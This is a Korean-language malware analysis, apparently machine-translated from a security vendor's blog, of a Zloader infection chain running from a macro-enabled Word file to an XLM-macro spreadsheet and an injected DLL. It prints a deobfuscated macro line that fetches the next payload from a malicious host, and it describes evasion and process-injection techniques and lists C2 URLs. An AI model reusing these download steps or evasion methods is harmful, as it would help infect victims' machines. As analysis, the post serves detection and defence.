악명 높은 제우스(Zeus) 뱅킹 악성코드의 변종인 Zloader(Terdot라고도 함)는 페이로드를 전송하기 위한 초기 벡터로 ".xls", ".xlsx" 파일을 공격적으로 사용하는 것으로 잘 알려져 있습니다. 그럼에도 불구하고, 최근 Zloader 계열이 초기 활동을 위해 ".docm" 파일을 사용하는 것이 발견되었습니다. 이는 공격자가 보안 솔루션의 탐지를 피하기 위해 오피스 문서를 이용한 실험을 선호한다는 것을 보여줍니다.
초기 벡터:
여기서 감염 사슬은 시작됩니다 “.docm” 파일. Docm은 "매크로 사용 가능 오피스 워드 문서"를 의미합니다. 아래에서 사용자에게 콘텐츠 사용 여부를 묻는 문서 뷰를 볼 수 있습니다.
다른 많은 문서와 마찬가지로, 콘텐츠를 활성화한 후 해당 문서의 동작을 관찰하려고 했지만 아무런 동작도 없었습니다. VBA 코드를 살펴본 결과, 콘텐츠 활성화는 매크로 실행을 유발하지 않는다는 것을 알 수 있었습니다. 여기서는 표시된 것처럼 "문서 닫기"를 클릭하면 매크로 실행이 시작됩니다.
피해자가 이 문서를 닫으면 기능 “nnn” 이 VBA 매크로의 주요 함수인 가 호출됩니다. 여기서도 하위 함수가 호출됩니다. 여기서도 적대적인 공격자는 다음을 사용합니다. “사용자 양식” 다음 단계 활동을 수행합니다.
UserForm_Initialize() 함수는 "Userform2"를 호출하는 데 사용됩니다. 아래 이미지는 userform2 객체를 보여줍니다. 대화 상자에서 URL 데이터는 청크 형태로 25번째 콤보박스에 겹쳐져 실제 데이터가 숨겨집니다. 아래 그림과 같습니다.
userform2의 모든 ComboBox를 살펴본 후, 2단계 페이로드를 다운로드하는 데 사용되는 악성 URL을 찾을 수 있었습니다.
위의 활동을 요약하자면, 적대자들은 for 루프를 사용하여 이 모든 값에 액세스하고 아래에 표시된 것처럼 최종 URL을 생성합니다.
바이러스 토탈 점수 1점을 받은 악성 사이트 "hxxps[:]//feelingfit-always[.]com/11[.]php"는 암호로 보호된 XLS 파일을 다운로드하는 데 사용됩니다. 해당 파일의 암호는 "Userform1"의 VBA 매크로에 다시 숨겨져 있습니다. userform1 데이터를 분석하여 숨겨진 암호를 추출할 수 있었습니다.
2nd 스테이지 탑재량:
문서를 비밀번호로 보호하는 것은 바이러스 백신 업체를 방어하는 고전적인 방법입니다. 심층적인 분석을 위해서는 정확한 비밀번호가 필요합니다. 위 비밀번호를 일치시키면 마침내 엑셀 통합 문서 내용을 확인할 수 있습니다. "Sheet3"에는 XLM 매크로가 사용되어 추가 작업을 수행합니다.
이 코드는 문서의 여러 셀에 삽입되어 있습니다. 아래 그림은 위 통합 문서에서 추출한 매크로 코드를 보여줍니다.
공격자는 IIF 및 Switch와 같은 Excel 내장 함수를 사용하여 데이터를 난독화합니다. 난독화가 해제된 최종 코드는 아래와 같습니다.
WinHttp.WinHttpRequest.5.1.open GET https[:]//santarosafuneralhome[.]com/2.php False
WinHttp.WinHttpRequest.5.1.SetRequestHeader
WinHttp.WinHttpRequest.5.1.전송
바이러스 총점 8점을 받은 위의 악성 URL은 이 공격의 3단계 페이로드를 다운로드하는 데 사용되었습니다.
최종 탑재량 분석:
DLL은 Zloader의 최종 페이로드입니다. 이 DLL은 고도로 난독화되어 Windows API에 대한 직접 호출을 방지합니다. 해싱을 사용하여 주소를 계산하고 계산된 값으로 호출하므로 역추적이 어렵습니다.
DLL은 Windows 구성 요소 설치 프로그램에 속하는 정품 Microsoft 프로세스인 'msiexec.exe' 프로세스를 일시 중단 모드로 생성하고 암호화된 파일을 여기에 삽입합니다.
또한 악성 PE를 해독하고 실행하기 위한 루틴을 주입합니다.
스레드 컨텍스트를 설정하면 초기 실행 지점이 전달되고 마지막으로 삽입된 코드가 재개 스레드로 실행됩니다.
msiexec.exe의 이 스레드가 실행되면 표시된 대로 CnC 서버에 연결을 시도합니다.
분석 시점에 해당 URL이 다운되어 더 깊이 파고들 수 없었습니다.
결론 :
이러한 유형의 공격은 공격자가 피해자를 감염시키기 위해 감염 사슬을 시작하는 혁신적인 메커니즘을 어떻게 사용하는지 보여줍니다. 사용자는 사무실 파일을 열 때 항상 주의해야 합니다. Quick Heal 및 Seqrite 엔터프라이즈 보안 솔루션 고객을 이러한 파일로부터 보호해야 합니다. 따라서 엔드포인트 보안 솔루션을 항상 최신 상태로 유지하는 것을 잊지 마세요.
IOC:
문서:
117fafb46f27238351f2111e8f01416412044238d2f8378a285063eb9d4eef3d
409ed829f19024045d26cc5d3a06e15a097605e13ba938875eca054a7a4a30b1
91aa050536d834947709776af40c2fde49471d28231de50df0d324cd55101df4
XLS: 52d071922413a3be8815a76118a45bf13d8d323b73ba42377591fd68c59dfc89
URL :
https://]tiodeitidampheater.tk/post.php
https[://]actes-etatcivil.com/post.php
https[://]ankarakreatif.com/post.php
https[://]www.ramazanyildiz.net/post.php
https://[://]hispaniaeng.com/post.php
https://]www.ifdd.francophonie.org/post.php
해당 분야 전문가
안잘리 라우트
프리양카 신데
